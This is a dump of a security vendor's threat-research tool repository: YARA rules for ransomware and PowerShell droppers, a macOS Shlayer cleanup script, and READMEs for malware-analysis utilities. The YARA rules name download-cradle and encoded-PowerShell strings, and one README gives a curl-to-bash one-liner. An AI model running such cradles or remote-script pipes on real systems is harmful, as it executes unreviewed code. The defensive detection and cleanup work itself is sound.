├── navgen
    ├── .gitignore
    ├── requirements.txt
    ├── LICENSE
    ├── README.md
    └── navgen.py
├── threat_hunting
    ├── CB-Command_R
    │   ├── requirements.txt
    │   ├── config.py
    │   ├── README.md
    │   └── cb-command_r.py
    ├── yara
    │   ├── powershell_reflective_injector_generic.yara
    │   ├── sodinokibi_ransomware_2019_Q3.yara
    │   ├── GandCrab_Ursnif_dropper_2019_Q1.yar
    │   └── tau_fancybear_downloader_public.yara
    └── IOCs
    │   ├── shlayer
    │       ├── domain-iocs.txt
    │       ├── hashes-iocs.txt
    │       └── urls-iocs.txt
    │   ├── IOCs_2019_Q3_Sodinokibi-Hashes.csv
    │   ├── IOCs_2019_Q3_Sodinokibi-Domains.csv
    │   └── IOCs_2019_Q1_Ursnif-GandCrab.csv
├── README.md
├── png_extract
    ├── bin
    │   ├── png_extract-32.exe
    │   └── png_extract-64.exe
    ├── stdafx.cpp
    ├── targetver.h
    ├── stdafx.h
    ├── LICENSE
    ├── png_extract.vcxproj.filters
    ├── README.md
    ├── png_extract.cpp
    └── png_extract.vcxproj
├── malware_specific
    ├── Sodinokibi
    │   ├── README.MD
    │   └── Sodinokibi_configparser.py
    └── FancyBear
    │   └── zebrocy_decrypt_artifact.py
├── pseudo_ransomware
    ├── setup.py
    ├── LICENSE
    ├── README.md
    └── pseudo_ransomware.py
├── powershell_meterpreter_extractor
    ├── LICENSE
    ├── README.md
    └── powershell_meterpreter_extractor.py
├── LICENSE
└── remediation
    └── shlayer
        ├── README.md
        └── shlayer-cleanup.sh


/navgen/.gitignore:
--------------------------------------------------------------------------------
1 | *.json


--------------------------------------------------------------------------------
/navgen/requirements.txt:
--------------------------------------------------------------------------------
1 | requests
2 | 


--------------------------------------------------------------------------------
/threat_hunting/CB-Command_R/requirements.txt:
--------------------------------------------------------------------------------
1 | json
2 | requests
3 | threaded


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # threat-research-tools
2 | Tools from the Cb Threat Research Team
3 | 


--------------------------------------------------------------------------------
/png_extract/bin/png_extract-32.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gfoss/tau-tools/master/png_extract/bin/png_extract-32.exe


--------------------------------------------------------------------------------
/png_extract/bin/png_extract-64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gfoss/tau-tools/master/png_extract/bin/png_extract-64.exe


--------------------------------------------------------------------------------
/png_extract/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // png_extract.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 | 
5 | #include "stdafx.h"
6 | 
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 | 


--------------------------------------------------------------------------------
/png_extract/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | 
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 | 
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 | 
8 | #include <SDKDDKVer.h>
9 | 


--------------------------------------------------------------------------------
/malware_specific/Sodinokibi/README.MD:
--------------------------------------------------------------------------------
 1 | ### Sodinokibi Ransomware Configuration Parser
 2 | 
 3 | Author: jmyers - CB TAU
 4 | Date: 20-June-2019
 5 | 
 6 | This script is intended to extract relevant configuration information from Sodinkibi Samples and may need to be updated as variants are updated.
 7 | 
 8 | #### Usage
 9 | 
10 | $ python sodinokibi_configparser.py $(path to file)


--------------------------------------------------------------------------------
/png_extract/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | 
10 | #include <stdio.h>
11 | #include <tchar.h>
12 | 
13 | 
14 | 
15 | // TODO: reference additional headers your program requires here
16 | 


--------------------------------------------------------------------------------
/pseudo_ransomware/setup.py:
--------------------------------------------------------------------------------
 1 | # setup.py
 2 | # NOTE: Not currently working due to puremagic's json not being pulled in
 3 | 
 4 | from distutils.core import setup
 5 | import py2exe
 6 | 
 7 | missing_files = [ ('puremagic', ['c:\python27\Lib\site-packages\puremagic\magic_data.json'] ) ]
 8 | 
 9 | setup(
10 |         console=['pseudo_ransomware.py'],
11 |         data_files = missing_files,
12 |         options = {
13 |             'py2exe': {
14 |                 'packages' : ['puremagic'],
15 |                 'bundle_files' : 1,
16 |                 }
17 |             }
18 | )
19 | 


--------------------------------------------------------------------------------
/threat_hunting/CB-Command_R/config.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | active = {
 4 |     'url': 'https://<SUBDOMAIN>.carbonblack.io/api/v1/process',
 5 |     'key': '<API KEY>'
 6 | }
 7 | 
 8 | # ======================================================================
 9 | # Place API key and URL in 'active' to use with the cmdline-search.py
10 | # ======================================================================
11 | 
12 | env1 = {
13 | 	'url': 'https://<SUBDOMAIN>.carbonblack.io/api/v1/process',
14 |     'key': '<API KEY>'
15 | }
16 | 
17 | env2 = {
18 |     'url': 'https://<SUBDOMAIN>.carbonblack.io/api/v1/process',
19 |     'key': '<API KEY>'
20 | }
21 | 
22 | etc = {
23 |     'url': 'https://<SUBDOMAIN>.carbonblack.io/api/v1/process',
24 |     'key': '<API KEY>'
25 | }


--------------------------------------------------------------------------------
/threat_hunting/yara/powershell_reflective_injector_generic.yara:
--------------------------------------------------------------------------------
 1 | rule Powershell_reflective_injector_generic : TAU PowerShell b64MZ
 2 | {
 3 |      meta:
 4 |           author = "Carbon Black TAU" //jmyers
 5 |           date = "2019-Jun-21"
 6 |           description = "Designed to catch PowerShell script to reflectively inject embedded b64 MZ"
 7 |           link = ""
 8 |           rule_version = 1
 9 |           yara_version = "3.10.0"
10 |           Confidence = "Prod"
11 |           Priority = "Medium"
12 |           TLP = "White"
13 |           exemplar_hashes = "aabf130306337094e09e4b2f1845310cece8f81f50c4f10bfc43bf9cccb0923d,01f34e9ab8835626f0ae554cb89b8d772d4aa3dfaf392e05d906e0f4f7123369"
14 |      strings:
15 |           $s1 = "[CmdletBinding()]"
16 |           $s2 = "$Win32Types = New-Object System.Object"
17 |           $s3 = "TVqQAA"
18 |           $s4 = "Invoke-Command"
19 |           $s5 = "FromBase64String"
20 |           $s6 = "Get-Win32Functions"
21 |           $s7 = "Get-VirtualProtectValue"
22 |      condition:
23 |           all of them
24 | 
25 | }


--------------------------------------------------------------------------------
/threat_hunting/yara/sodinokibi_ransomware_2019_Q3.yara:
--------------------------------------------------------------------------------
 1 | rule Sodinokibi_ransomware_2019_Q3 : TAU ecrime ransomware
 2 | {
 3 |      meta:
 4 |           author = "Carbon Black TAU" //jmyers
 5 |           date = "2019-Jun-21"
 6 |           description = "Designed to catch Sodinokibi Ransomware Variants"
 7 |           link = ""
 8 |           rule_version = 1
 9 |           yara_version = "3.10.0"
10 |           Confidence = "Prod"
11 |           Priority = "Medium"
12 |           TLP = "White"
13 |           exemplar_hashes = "200d374121201b711c98b5bb778ab8ca46d334e06f2fc820a2ea7e70c251095e,32a72f3bc54b65651ec263c11e86738299d172043a9cdd146001780501c75078"
14 |      strings:
15 |           $s1 = "\\BaseNamedObjects" wide
16 |           $s2 = "kernel32.dll" wide ascii
17 |           $s3 = "kernelbase.dll" wide
18 |           $s4 = "CreateThread"
19 |           $s5 = "CloseHandle"
20 |           $s6 = "kexpand"
21 |           $s7 = {E8 58 3F 00 00}
22 |           $s8 = {FF 35 24 E0 01 10}
23 |           $s9 = {40 3D 00 01 00 00}
24 |      condition:
25 |           7 of ($s*)
26 | }


--------------------------------------------------------------------------------
/navgen/LICENSE:
--------------------------------------------------------------------------------
 1 | The MIT License (MIT)
 2 | 
 3 | Copyright (c) 2018 Carbon Black
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
 6 | 
 7 | The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
 8 | 
 9 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
10 | 


--------------------------------------------------------------------------------
/png_extract/LICENSE:
--------------------------------------------------------------------------------
 1 | The MIT License (MIT)
 2 | 
 3 | Copyright (c) 2017 Carbon Black
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
 6 | 
 7 | The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
 8 | 
 9 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
10 | 


--------------------------------------------------------------------------------
/pseudo_ransomware/LICENSE:
--------------------------------------------------------------------------------
 1 | The MIT License (MIT)
 2 | 
 3 | Copyright (c) 2017 Carbon Black
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
 6 | 
 7 | The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
 8 | 
 9 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
10 | 


--------------------------------------------------------------------------------
/powershell_meterpreter_extractor/LICENSE:
--------------------------------------------------------------------------------
 1 | The MIT License (MIT)
 2 | 
 3 | Copyright (c) 2018 Carbon Black
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
 6 | 
 7 | The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
 8 | 
 9 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
10 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2017 Carbon Black
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/remediation/shlayer/README.md:
--------------------------------------------------------------------------------
 1 | # OSX Shlayer Cleanup Script
 2 | 
 3 | ### Blog: [New MacOS Malware Variant of Shlayer Discovered](https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/)
 4 | 
 5 | ### Instructions
 6 | 
 7 | There are two ways to run this script. Interactively and Automatically.
 8 | 
 9 | First things first, ensure the script is executable:
10 | 
11 |     $ chmod +x ./shlayer-cleanup.sh
12 | 
13 | #### Interactive Execution
14 | 
15 | Allows you to step through the execution and review all files before making a decision on removing them.
16 | 
17 |     $ ./shlayer-cleanup.sh
18 | 
19 | #### Automatic Execution
20 | 
21 | Runs the script and automatically deletes any detected Shlayer malicious files.
22 | 
23 |     $ ./shlayer-cleanup.sh --autoremove
24 | 
25 | To download and execute this script directly from this repository you can run the following one-liner. (Be careful and review the script before doing this)
26 | 
27 |     $ curl -s https://raw.githubusercontent.com/carbonblack/tau-tools/master/remediation/shlayer/shlayer-cleanup.sh | bash -s -- --autoremove
28 | 
29 | To execute this script using Carbon Black's Live Response, add 'execfg' to the beginning of the string.
30 | 
31 | #### Example
32 | 
33 | ![image](https://user-images.githubusercontent.com/727732/52649660-ecde8b80-2ea5-11e9-81f8-0f9dce1d187d.png)
34 | 


--------------------------------------------------------------------------------
/png_extract/png_extract.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <Text Include="ReadMe.txt" />
19 |   </ItemGroup>
20 |   <ItemGroup>
21 |     <ClInclude Include="stdafx.h">
22 |       <Filter>Header Files</Filter>
23 |     </ClInclude>
24 |     <ClInclude Include="targetver.h">
25 |       <Filter>Header Files</Filter>
26 |     </ClInclude>
27 |   </ItemGroup>
28 |   <ItemGroup>
29 |     <ClCompile Include="stdafx.cpp">
30 |       <Filter>Source Files</Filter>
31 |     </ClCompile>
32 |     <ClCompile Include="png_extract.cpp">
33 |       <Filter>Source Files</Filter>
34 |     </ClCompile>
35 |   </ItemGroup>
36 | </Project>


--------------------------------------------------------------------------------
/threat_hunting/yara/GandCrab_Ursnif_dropper_2019_Q1.yar:
--------------------------------------------------------------------------------
 1 | rule macro_GandCrab_Ursnif_dropper_2019_Q1 : TAU Trojan Ecrime Ransomware
 2 | {
 3 | 	meta:
 4 | 		author = "Carbon Black TAU" //jmyers
 5 | 		date = "2019-Jan-14"
 6 | 		description = "Designed to catch PowerShell encoded command in Word Shape box as alternative text"
 7 | 		link = ""
 8 | 		rule_version = 1
 9 | 		yara_version = "3.7.0"
10 | 		Confidence = "Prod"
11 | 		Priority = "Medium"
12 | 		TLP = "White"
13 | 		exemplar_hashes = "0a3f915dd071e862046949885043b3ba61100b946cbc0d84ef7c44d77a50f080,cc5a14ff026ee593d7d25f213715b73833e6b9cf71091317121a009d5ad7fc36"
14 | 	strings:
15 | 		$s1 = "powershell.exe -NoP -Exec Bypass -EC " wide
16 | 	condition:
17 | 		all of them and 
18 | 		uint16(0) == 0xCFD0
19 | }
20 | 
21 | rule GandCrab_Ursnif_PowerShell_cradle_2019_Q1 : TAU TROJAN Ecrime Ransomware
22 | {
23 | 		meta:
24 | 		author = "Carbon Black TAU" //jmyers
25 | 		date = "2019-Jan-14"
26 | 		description = "Designed to catch PowerShell cradle from campaign"
27 | 		link = ""
28 | 		rule_version = 1
29 | 		yara_version = "3.7.0"
30 | 		Confidence = "Prod"
31 | 		Priority = "Medium"
32 | 		TLP = "White"
33 | 		exemplar_hashes = "3b59549507e0e3cfb4a363a306bf6eb4d26995066df643e1fc8e4e11eaffa7f9,debe4cb5645f10e6b6383838c25f26781a61acb536d2246cdf8dc33bbc1a2414"
34 | 	strings:
35 | 		$s1 = "If($ENV:PROCESSOR_ARCHITECTURE -contains 'AMD64')"
36 | 		$s2 = "$Env:WINDIR\\SysWOW64\\WindowsPowerShell"
37 | 		$s3 = "new-object net.webclient"
38 | 		$s4 = "downloadstring"
39 | 		$s5 = "Invoke"
40 | 		$s6 = "Sleep"
41 | 	condition:
42 | 		4 of ($s*) and 
43 | 		filesize < 2KB
44 | }
45 | 


--------------------------------------------------------------------------------
/png_extract/README.md:
--------------------------------------------------------------------------------
 1 | # png_extractor
 2 | 
 3 | ## Synopsis
 4 | 
 5 |     This project is for extracting PEs embedded inside png PE resources.
 6 | 
 7 |     See https://www.carbonblack.com/2017/08/07/threat-analysis-carbon-black-threat-research-dissects-png-dropper/
 8 | 
 9 | ## Usage Example
10 | 
11 |     ./png_extract <input file> <output file>
12 | 
13 | ## History
14 | 
15 |     Version 1.0 - Initial release
16 | 
17 | ## Author
18 |  
19 |  Brian Sturk (bsturk@carbonblack.com)
20 | 
21 | ## License
22 | 
23 |     The MIT License (MIT)
24 | 
25 |     Copyright (c) 2017 Carbon Black
26 | 
27 |     Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
28 | 
29 |     The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
30 | 
31 |     THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
32 | 


--------------------------------------------------------------------------------
/pseudo_ransomware/README.md:
--------------------------------------------------------------------------------
 1 | # pseudo_ransomware
 2 | 
 3 | ## Synopsis
 4 | 
 5 |     This project is for simulating different techniques of ransomware in a non-destructive/recoverable way.
 6 | 
 7 | ## Usage Example
 8 | 
 9 |     python pseudo_ransomware.py -r -p file_dir -x .crypt -N http://www.wtfismyip.com -c 1 -w 3
10 | 
11 | ## MBRs
12 | 
13 |     https://github.com/brainsmoke/nyanmbr
14 |     https://github.com/daniel-e/tetros
15 | 
16 | ## History
17 | 
18 |     Version 1.10
19 | 
20 | ## Author
21 |  
22 |  Brian Sturk (bsturk@carbonblack.com)
23 | 
24 | ## License
25 | 
26 |     The MIT License (MIT)
27 | 
28 |     Copyright (c) 2017 Carbon Black
29 | 
30 |     Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
31 | 
32 |     The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
33 | 
34 |     THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
35 | 


--------------------------------------------------------------------------------
/remediation/shlayer/shlayer-cleanup.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # OSX Shlayer Cleanup Script
 4 | # gfoss[at]carbonblack[.]com
 5 | # Feb 11, 2019
 6 | 
 7 | # Run automatically or interactively?
 8 | autoremove=false
 9 | if 	[[ "$1" == "--autoremove" ]]; then
10 | 	autoremove=true
11 | fi
12 | 
13 | # When running interactively, display warning
14 | if [[ $autoremove == "false" ]]; then
15 | 	echo ""
16 | 	echo "[[ WARNING - THIS SCRIPT WILL DELETE FILES! MAKE SURE THAT YOU ARE OKAY WITH THIS BEFORE PROCEEDING! ]]"
17 | 	echo -n "					Enter 'YES' to continue: "
18 | 	read shallWeContinue
19 | 	if [ $shallWeContinue != 'YES' ]; then
20 | 		echo ""
21 | 		exit 1
22 | 	fi
23 | else
24 | 	echo ""
25 | 	echo "[[ WARNING - THIS SCRIPT WILL DELETE FILES! MAKE SURE THAT YOU ARE OKAY WITH THIS BEFORE PROCEEDING! ]]"
26 | 	echo "					Press CRTL+C to abort..."
27 | 	sleep 5
28 | fi
29 | 
30 | # Set Directories
31 | directories=("/tmp/*/Player*.app/"
32 | 		"/Applications/Mac*Cleanup*Pro*.app/"
33 | 		"/Volumes/Player/"
34 | 		"/Volumes/FlashPlayer/"
35 | 		"/private/tmp/*/Player/"
36 | 		"/private/var/folders/*/*/T/AppTranslocation/*/d/Player_*.app"
37 | 		"/private/var/folders/*/*/T/AppTranslocation/*/d/FashPlayer_*.app"
38 | 		"/private/var/folders/*/*/T/AppTranslocation/*/d/iZipFast_*.app"
39 | 		"/private/var/folders/*/*/T/AppTranslocation/*/d/Player_DMG_*.app"
40 | 		"/private/var/folders/*/*/T/AppTranslocation/*/d/TimerRush_*.app"
41 | 		"/private/var/folders/*/*/T/AppTranslocation/*/d/VidsToGifs_*.app")
42 | 
43 | echo ""
44 | 
45 | # Check Primary Directories for Player Files and remove if found
46 | for directory in ${directories[@]}; do
47 | 	if [ -d "$directory" ]; then
48 | 		echo -e "OSX Shlayer Infection Detected!"
49 | 		echo "     $directory"
50 | 		if [[ $autoremove == "false" ]]; then
51 | 			echo -n "Would you like to delete the malware directory? Enter (y/n): "
52 | 			read cleanupChoice
53 | 		else
54 | 			cleanupChoice="y"
55 | 		fi
56 | 		if [ $cleanupChoice == "y" ]; then
57 | 			sudo rm -rf "$directory" && echo "Malware Has Been Removed..." || echo "unable to remove this directory, please run this script with sudo or manually delete this directory"
58 | 		else
59 | 			echo "It is recommended to remove this directory to prevent continued infection!"
60 | 		fi
61 | 		echo ""
62 | 	fi
63 | done
64 | 


--------------------------------------------------------------------------------
/navgen/README.md:
--------------------------------------------------------------------------------
 1 | # Navigator Generator (NavGen)
 2 | 
 3 | ## Synopsis
 4 | 
 5 | This project is for generating a MITRE Navigator JSON file that can be used to upload to an on-prem or github instance (https://mitre.github.io/attack-navigator/enterprise/).
 6 | 
 7 | ## Usage Example
 8 | 
 9 |     python navgen.py
10 | 	[!] To find your API key, login to your Cb Response UI and navigate to the profile section.
11 | 	[!] Here, enter the full url of your Cb Response instance. Example: https://bugcrowd.my.carbonblack.io
12 | 	[*] > https://testing-instance.my.carbonblack.io
13 | 	[*] Enter your API key: > 400389f1ac4195c978bdce6c9a5421ce1185bba2
14 | 	
15 | 	Your url is: https://testing-instance.my.carbonblack.io
16 | 	Your API key is: 400389f1ac4195c978bdce6c9a5421ae1185bba2
17 | 	There are 515 total threat reports found.
18 | 	
19 | 	[!] Saved MITRE Navigator json file as CbResponseNavigator-1543418603.json
20 | 	[!] Use this file to 'Open Existing Layer' from local file on https://mitre.github.io/attack-navigator/enterprise/
21 | 
22 | ## History
23 | 
24 | Version 1.0 - Initial release
25 | 
26 | ## Author
27 |  
28 | Adam Nadrowski ([@\_sup\_mane](https://twitter.com/_sup_mane))
29 | 
30 | ## License
31 | 
32 |     The MIT License (MIT)
33 | 
34 |     Copyright (c) 2018 Carbon Black
35 | 
36 |     Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
37 | 
38 |     The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
39 | 
40 |     THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
41 | 


--------------------------------------------------------------------------------
/powershell_meterpreter_extractor/README.md:
--------------------------------------------------------------------------------
 1 | # powershell_meterpreter_extractor
 2 | 
 3 | ## Synopsis
 4 | 
 5 |     This project is for extracting base64 encoded shellcode used to deliver Meterpreter payloads.
 6 | 
 7 | ## Usage Help
 8 | 
 9 |     python powershell_meterpreter_extractor.py --help
10 |     usage: powershell_meterpreter_extractor.py [-h] [-o OUTPUT] (-i INPUT | -f FILE)
11 | 
12 |     optional arguments:
13 |       -h, --help            show this help message and exit
14 |       -o OUTPUT, --output OUTPUT
15 |                             Provide a path to save final stage payload
16 |       -i INPUT, --input INPUT
17 |                             Provide a base64 encoded string in the command line
18 |       -f FILE, --file FILE  Provide a path to a file that contains a base64
19 |                             encoded string
20 | 
21 | ## Usage Example
22 | 
23 |  The following will accept an input file containing the base64 encoded string and output the first and second stage to disk: 
24 | 
25 |     ./powershell_meterpreter_extractor.py -f <input file> -o <output file>
26 | 
27 |  The following will accept a base64 string passed as a cmd line arg and output text to terminal:
28 | 
29 |     ./powershell_meterpreter_extractor.py -i <base64 encoded string>
30 | 
31 | ## History
32 | 
33 |     Version 1.0 - Initial release
34 | 
35 | ## Author
36 |  
37 |  Adam Nadrowski (anadrowski@carbonblack.com)
38 |  
39 |  Jared Myers (jmyers@carbonblack.com)
40 | 
41 | ## License
42 | 
43 |     The MIT License (MIT)
44 | 
45 |     Copyright (c) 2018 Carbon Black
46 | 
47 |     Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
48 | 
49 |     The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
50 | 
